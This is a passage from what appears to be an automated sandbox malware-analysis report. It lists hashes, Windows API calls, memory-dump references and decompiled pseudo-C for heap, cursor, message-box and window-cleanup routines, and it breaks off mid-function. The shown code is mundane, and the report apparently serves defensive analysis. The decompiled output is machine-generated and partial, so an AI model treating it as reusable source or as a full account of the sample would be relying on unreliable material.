                                                                                                                                                                                                                                                                                          • Opcode ID: 91bd1eb0af290896c64eb6c46c785b79931d9b544ac1447b97a7e3596eb0b31b
                                                                                                                                                                                                                                                                                          • Instruction ID: fee4b2f8ea85988c9e2c476a5c590a2541415018730acac1796a74d47de74cde
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91bd1eb0af290896c64eb6c46c785b79931d9b544ac1447b97a7e3596eb0b31b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E41A5B5E00208AFDB04DFA9D985AEEBBF5FB4C710F108169E519A7390D774A941CFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 02522B8D
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02522B94
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02522C65
                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 02522C6C
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02522CB1
                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 02522CB8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 168621272-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 51b7779d5b677c6b98e40bc31692b49409fd2e2baf2c8c8805a39a0e9ae22e24
                                                                                                                                                                                                                                                                                          • Instruction ID: 0c17151ab4184bdc41e92c0fc5b6b8c86741f61fb1607c21ff9b38177f2f3b7f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51b7779d5b677c6b98e40bc31692b49409fd2e2baf2c8c8805a39a0e9ae22e24
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3414BB5D0421AEBDB04CFA4C984BAE7BB5FF45304F108619E925A73C0D7749A48CFA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                                                                                          			E001036B0(intOrPtr* __ecx, char _a4) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				CHAR* _v24;
                                                                                                                                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                                          				CHAR** _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                                                          				CHAR* _t62;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t64;
                                                                                                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                                                                                                          				LONG* _t75;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t77;
                                                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F410);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t82 = _t81 - 8;
                                                                                                                                                                                                                                                                                          				_t30 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t30 ^ _t80);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t77 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                          					_t54 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t54 = __ecx - 0x24;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_t54 + 4), 0x43f, 0, 0);
                                                                                                                                                                                                                                                                                          				SetCursor( *(_t77 + 0x24));
                                                                                                                                                                                                                                                                                          				E00103C60( &_v20, 0);
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t37 = _v20;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t37 - 8)) <= 0) {
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					if(_t37 - 0xc != 0x15ad20) {
                                                                                                                                                                                                                                                                                          						_t37 = InterlockedDecrement(_t37 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          						if(_t37 <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_v20 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          							_t37 = E001062C2();
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return _t37;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t62 =  *0x15ad30; // 0x15ad2c
                                                                                                                                                                                                                                                                                          					_v24 = _t62;
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					_push( *((intOrPtr*)(_t77 + 8)));
                                                                                                                                                                                                                                                                                          					_push( *((intOrPtr*)(_t77 + 4)));
                                                                                                                                                                                                                                                                                          					E000F58F0( &_v24, _t37, _a4);
                                                                                                                                                                                                                                                                                          					_t82 = _t82 + 0x10;
                                                                                                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                                                                                                          					_push( &_a4);
                                                                                                                                                                                                                                                                                          					if( *_t77 == 0) {
                                                                                                                                                                                                                                                                                          						_t41 = E00103C60();
                                                                                                                                                                                                                                                                                          						_t64 =  *(_t54 + 4);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t41 = E00103C60();
                                                                                                                                                                                                                                                                                          						_t64 =  *( *_t77 + 4);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t74 = _v24;
                                                                                                                                                                                                                                                                                          					MessageBoxA(_t64, _t74,  *_t41, 0x40);
                                                                                                                                                                                                                                                                                          					_t44 = _a4;
                                                                                                                                                                                                                                                                                          					_t20 = _t44 - 0xc; // -12
                                                                                                                                                                                                                                                                                          					if(_t20 != 0x15ad20 && InterlockedDecrement(_t44 + 0xfffffff4) <= 0) {
                                                                                                                                                                                                                                                                                          						_push(_a4 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          						E001062C2();
                                                                                                                                                                                                                                                                                          						_t82 = _t82 + 4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					if(_t74 - 0xc != 0x15ad20) {
                                                                                                                                                                                                                                                                                          						_t75 =  &(_t74[0xfffffffffffffff4]);
                                                                                                                                                                                                                                                                                          						if(InterlockedDecrement(_t75) <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t75);
                                                                                                                                                                                                                                                                                          							E001062C2();
                                                                                                                                                                                                                                                                                          							_t82 = _t82 + 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t37 = _v20;
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x001036b3
                                                                                                                                                                                                                                                                                          0x001036b5
                                                                                                                                                                                                                                                                                          0x001036c0
                                                                                                                                                                                                                                                                                          0x001036c1
                                                                                                                                                                                                                                                                                          0x001036c7
                                                                                                                                                                                                                                                                                          0x001036ce
                                                                                                                                                                                                                                                                                          0x001036d2
                                                                                                                                                                                                                                                                                          0x001036d8
                                                                                                                                                                                                                                                                                          0x001036dc
                                                                                                                                                                                                                                                                                          0x001036e3
                                                                                                                                                                                                                                                                                          0x001036de
                                                                                                                                                                                                                                                                                          0x001036de
                                                                                                                                                                                                                                                                                          0x001036de
                                                                                                                                                                                                                                                                                          0x001036f2
                                                                                                                                                                                                                                                                                          0x001036fc
                                                                                                                                                                                                                                                                                          0x00103708
                                                                                                                                                                                                                                                                                          0x0010370d
                                                                                                                                                                                                                                                                                          0x00103714
                                                                                                                                                                                                                                                                                          0x0010371c
                                                                                                                                                                                                                                                                                          0x001037c9
                                                                                                                                                                                                                                                                                          0x001037cc
                                                                                                                                                                                                                                                                                          0x001037d9
                                                                                                                                                                                                                                                                                          0x001037df
                                                                                                                                                                                                                                                                                          0x001037e7
                                                                                                                                                                                                                                                                                          0x001037ef
                                                                                                                                                                                                                                                                                          0x001037f0
                                                                                                                                                                                                                                                                                          0x001037f5
                                                                                                                                                                                                                                                                                          0x001037e7
                                                                                                                                                                                                                                                                                          0x001037fb
                                                                                                                                                                                                                                                                                          0x00103809
                                                                                                                                                                                                                                                                                          0x00103722
                                                                                                                                                                                                                                                                                          0x00103722
                                                                                                                                                                                                                                                                                          0x00103728
                                                                                                                                                                                                                                                                                          0x0010372b
                                                                                                                                                                                                                                                                                          0x00103735
                                                                                                                                                                                                                                                                                          0x00103739
                                                                                                                                                                                                                                                                                          0x0010373f
                                                                                                                                                                                                                                                                                          0x00103744
                                                                                                                                                                                                                                                                                          0x0010374a
                                                                                                                                                                                                                                                                                          0x0010374f
                                                                                                                                                                                                                                                                                          0x00103750
                                                                                                                                                                                                                                                                                          0x0010375e
                                                                                                                                                                                                                                                                                          0x00103763
                                                                                                                                                                                                                                                                                          0x00103752
                                                                                                                                                                                                                                                                                          0x00103752
                                                                                                                                                                                                                                                                                          0x00103759
                                                                                                                                                                                                                                                                                          0x00103759
                                                                                                                                                                                                                                                                                          0x00103768
                                                                                                                                                                                                                                                                                          0x00103770
                                                                                                                                                                                                                                                                                          0x00103776
                                                                                                                                                                                                                                                                                          0x00103779
                                                                                                                                                                                                                                                                                          0x00103782
                                                                                                                                                                                                                                                                                          0x00103798
                                                                                                                                                                                                                                                                                          0x00103799
                                                                                                                                                                                                                                                                                          0x0010379e
                                                                                                                                                                                                                                                                                          0x0010379e
                                                                                                                                                                                                                                                                                          0x001037a4
                                                                                                                                                                                                                                                                                          0x001037ad
                                                                                                                                                                                                                                                                                          0x001037af
                                                                                                                                                                                                                                                                                          0x001037bb
                                                                                                                                                                                                                                                                                          0x001037bd
                                                                                                                                                                                                                                                                                          0x001037be
                                                                                                                                                                                                                                                                                          0x001037c3
                                                                                                                                                                                                                                                                                          0x001037c3
                                                                                                                                                                                                                                                                                          0x001037bb
                                                                                                                                                                                                                                                                                          0x001037c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001037c6

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000043F,00000000,00000000), ref: 001036F2
                                                                                                                                                                                                                                                                                          • SetCursor.USER32(?), ref: 001036FC
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 00103770
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(-000000F4), ref: 00103788
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 001037B3
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 001037DF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DecrementInterlocked$Message$CursorSend
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 504520102-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fea50c54da35e42a1c42fcd008259cecb9725d3f7cbfa1719c61f5a9dfd9d7fa
                                                                                                                                                                                                                                                                                          • Instruction ID: cf47b0bc0f78530afb2ec0f93c6d3c00ad38c9f33b3f48a7dfaf006d59576c85
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fea50c54da35e42a1c42fcd008259cecb9725d3f7cbfa1719c61f5a9dfd9d7fa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF41B4B2900608EBD714DB64CD85B6AB3B8FF58720F148619F971AB6D0D7B0AA44C751
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00102A90(CHAR* __eax, void* __ebx, void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				int _t40;
                                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                                          				CHAR* _t80;
                                                                                                                                                                                                                                                                                          				CHAR* _t82;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t62 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_t80 = __eax;
                                                                                                                                                                                                                                                                                          				_t40 = 0;
                                                                                                                                                                                                                                                                                          				if(__ebx == 0) {
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t1 = _t62 - 0x24; // 0x0
                                                                                                                                                                                                                                                                                          					_v8 = _t1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t4 = _t62 + 4; // 0x28
                                                                                                                                                                                                                                                                                          				_t89 = _t4;
                                                                                                                                                                                                                                                                                          				if(_t80 != _t40) {
                                                                                                                                                                                                                                                                                          					_t40 = lstrlenA(_t80);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E000F5F10(_t40, _t89, _t80);
                                                                                                                                                                                                                                                                                          				_t82 = _a4;
                                                                                                                                                                                                                                                                                          				_t6 = _t62 + 8; // 0x2c
                                                                                                                                                                                                                                                                                          				_t90 = _t6;
                                                                                                                                                                                                                                                                                          				if(_t82 != 0) {
                                                                                                                                                                                                                                                                                          					_t42 = lstrlenA(_t82);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t42 = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E000F5F10(_t42, _t90, _t82);
                                                                                                                                                                                                                                                                                          				_t85 = _v8 + 0x24;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t62 + 0x14)) = _a8;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t62 + 0x18)) = _a12;
                                                                                                                                                                                                                                                                                          				 *(_t62 + 0x1c) = 1;
                                                                                                                                                                                                                                                                                          				if(E001035A0( *((intOrPtr*)(_t62 + 4)), _t85, _a8) != 0 || E00102580( *((intOrPtr*)(_t62 + 0x18)),  *((intOrPtr*)(_t62 + 0x14)), _t85,  *((intOrPtr*)(_t62 + 4)),  *(_t62 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                                          					if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          						_a4 = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_a4 = _t85 - 0x24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t85 + 0x24)) = SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_a4 + 4), 0x43f, 1, 0);
                                                                                                                                                                                                                                                                                          					_a4 = 0;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_a4 = _a4 + 1;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_v8 + 4), 0xc2, 0,  *(_t62 + 8));
                                                                                                                                                                                                                                                                                          					} while (E00102580( *((intOrPtr*)(_t62 + 0x18)),  *((intOrPtr*)(_t62 + 0x14)), _t85,  *((intOrPtr*)(_t62 + 4)),  *(_t62 + 0x1c)) != 0);
                                                                                                                                                                                                                                                                                          					return E001036B0(_t85, _a4);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t92 =  *((intOrPtr*)(_t62 + 4));
                                                                                                                                                                                                                                                                                          					if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          						_t60 = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t60 = _t85 - 0x24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t20 = _t60 + 0x24; // 0xf6d70
                                                                                                                                                                                                                                                                                          					 *(_t85 + 0x10) = 1;
                                                                                                                                                                                                                                                                                          					return E00103810(_t20, _t92);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x00102a90
                                                                                                                                                                                                                                                                                          0x00102a93
                                                                                                                                                                                                                                                                                          0x00102a96
                                                                                                                                                                                                                                                                                          0x00102a98
                                                                                                                                                                                                                                                                                          0x00102a9c
                                                                                                                                                                                                                                                                                          0x00102aa6
                                                                                                                                                                                                                                                                                          0x00102a9e
                                                                                                                                                                                                                                                                                          0x00102a9e
                                                                                                                                                                                                                                                                                          0x00102aa1
                                                                                                                                                                                                                                                                                          0x00102aa1
                                                                                                                                                                                                                                                                                          0x00102aa9
                                                                                                                                                                                                                                                                                          0x00102aa9
                                                                                                                                                                                                                                                                                          0x00102aae
                                                                                                                                                                                                                                                                                          0x00102ab1
                                                                                                                                                                                                                                                                                          0x00102ab1
                                                                                                                                                                                                                                                                                          0x00102aba
                                                                                                                                                                                                                                                                                          0x00102abf
                                                                                                                                                                                                                                                                                          0x00102ac2
                                                                                                                                                                                                                                                                                          0x00102ac2
                                                                                                                                                                                                                                                                                          0x00102ac7
                                                                                                                                                                                                                                                                                          0x00102ace
                                                                                                                                                                                                                                                                                          0x00102ac9
                                                                                                                                                                                                                                                                                          0x00102ac9
                                                                                                                                                                                                                                                                                          0x00102ac9
                                                                                                                                                                                                                                                                                          0x00102ad7
                                                                                                                                                                                                                                                                                          0x00102ae9
                                                                                                                                                                                                                                                                                          0x00102aed
                                                                                                                                                                                                                                                                                          0x00102af0
                                                                                                                                                                                                                                                                                          0x00102af3
                                                                                                                                                                                                                                                                                          0x00102b01
                                                                                                                                                                                                                                                                                          0x00102b44
                                                                                                                                                                                                                                                                                          0x00102b4e
                                                                                                                                                                                                                                                                                          0x00102b46
                                                                                                                                                                                                                                                                                          0x00102b49
                                                                                                                                                                                                                                                                                          0x00102b49
                                                                                                                                                                                                                                                                                          0x00102b6b
                                                                                                                                                                                                                                                                                          0x00102b7c
                                                                                                                                                                                                                                                                                          0x00102b82
                                                                                                                                                                                                                                                                                          0x00102b90
                                                                                                                                                                                                                                                                                          0x00102b99
                                                                                                                                                                                                                                                                                          0x00102ba5
                                                                                                                                                                                                                                                                                          0x00102bc0
                                                                                                                                                                                                                                                                                          0x00102bd4
                                                                                                                                                                                                                                                                                          0x00102b1c
                                                                                                                                                                                                                                                                                          0x00102b1c
                                                                                                                                                                                                                                                                                          0x00102b21
                                                                                                                                                                                                                                                                                          0x00102b28
                                                                                                                                                                                                                                                                                          0x00102b23
                                                                                                                                                                                                                                                                                          0x00102b23
                                                                                                                                                                                                                                                                                          0x00102b23
                                                                                                                                                                                                                                                                                          0x00102b2b
                                                                                                                                                                                                                                                                                          0x00102b2e
                                                                                                                                                                                                                                                                                          0x00102b3f
                                                                                                                                                                                                                                                                                          0x00102b3f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000260,?,8189C294,000F6D4C,?,00101881,5204418B,8189C294,8189C294,?,?,000FFD16,?,000F6D4C,?,?), ref: 00102AB1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,8189C294,000F6D4C,?,00101881,5204418B,8189C294,8189C294,?,?,000FFD16,?,000F6D4C,?,?), ref: 00102ACE
                                                                                                                                                                                                                                                                                          • LoadCursorA.USER32 ref: 00102B5C
                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,00101881), ref: 00102B63
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000043F,00000001,00000000), ref: 00102B7C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000C2,00000000,?), ref: 00102BA5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CursorMessageSendlstrlen$Load
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2433542616-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4e8c053a52651bc1ef47e47080cdca9578472d56093c10bb4494dbe7ba651f11
                                                                                                                                                                                                                                                                                          • Instruction ID: bb14f1120e301e0398fc221537b52cbfd0946477e5795500e3987f6d6c5b3100
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e8c053a52651bc1ef47e47080cdca9578472d56093c10bb4494dbe7ba651f11
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03415075600204EFCB14DF54C9C8BAABBE9EF98350F148059FD499B385EBB0E951CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E000FBA00(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t40;
                                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F6F0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t35 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t35 ^ _t73);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t71 = _a4;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_t4 = _t71 + 0x5c; // 0xcccc0004
                                                                                                                                                                                                                                                                                          				if(IsWindow( *_t4) != 0) {
                                                                                                                                                                                                                                                                                          					_t5 = _t71 + 0x5c; // 0xcccc0004
                                                                                                                                                                                                                                                                                          					_t6 = _t71 + 0x6c; // 0x6aec8b55
                                                                                                                                                                                                                                                                                          					if( *_t6 == GetWindowLongA( *_t5, 0xfffffffc)) {
                                                                                                                                                                                                                                                                                          						_t7 = _t71 + 0x74; // 0xa1640010
                                                                                                                                                                                                                                                                                          						_t8 = _t71 + 0x5c; // 0xcccc0004
                                                                                                                                                                                                                                                                                          						if(SetWindowLongA( *_t8, 0xfffffffc,  *_t7) != 0) {
                                                                                                                                                                                                                                                                                          							 *(_t71 + 0x74) = DefWindowProcA;
                                                                                                                                                                                                                                                                                          							 *(_t71 + 0x5c) = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t11 = _t71 + 0x44; // 0x1f34
                                                                                                                                                                                                                                                                                          				_t40 =  *_t11;
                                                                                                                                                                                                                                                                                          				if(_t40 != 0 && ( *(_t71 + 0x58) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          					DestroyMenu(_t40);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t15 = _t71 + 0x48; // 0x10845f6
                                                                                                                                                                                                                                                                                          				_t41 =  *_t15;
                                                                                                                                                                                                                                                                                          				if(_t41 != 0) {
                                                                                                                                                                                                                                                                                          					ImageList_Destroy(_t41);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t16 = _t71 + 0xa4; // 0xfc45c700
                                                                                                                                                                                                                                                                                          				_t42 =  *_t16;
                                                                                                                                                                                                                                                                                          				if(_t42 != 0 && DeleteObject(_t42) != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t71 + 0xa4) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t18 = _t71 + 0x6c; // 0x6aec8b55
                                                                                                                                                                                                                                                                                          				_t43 =  *_t18;
                                                                                                                                                                                                                                                                                          				if( *_t18 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t43);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t19 = _t71 + 0x4c; // 0xe8560974
                                                                                                                                                                                                                                                                                          				_t44 =  *_t19;
                                                                                                                                                                                                                                                                                          				if( *_t19 != 0) {
                                                                                                                                                                                                                                                                                          					E00105DE2(_t44);
                                                                                                                                                                                                                                                                                          					_t74 = _t74 + 4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t71 + 0x4c)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x50)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x54)) = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 2;
                                                                                                                                                                                                                                                                                          				_t24 = _t71 + 0x34; // 0xcccccccc
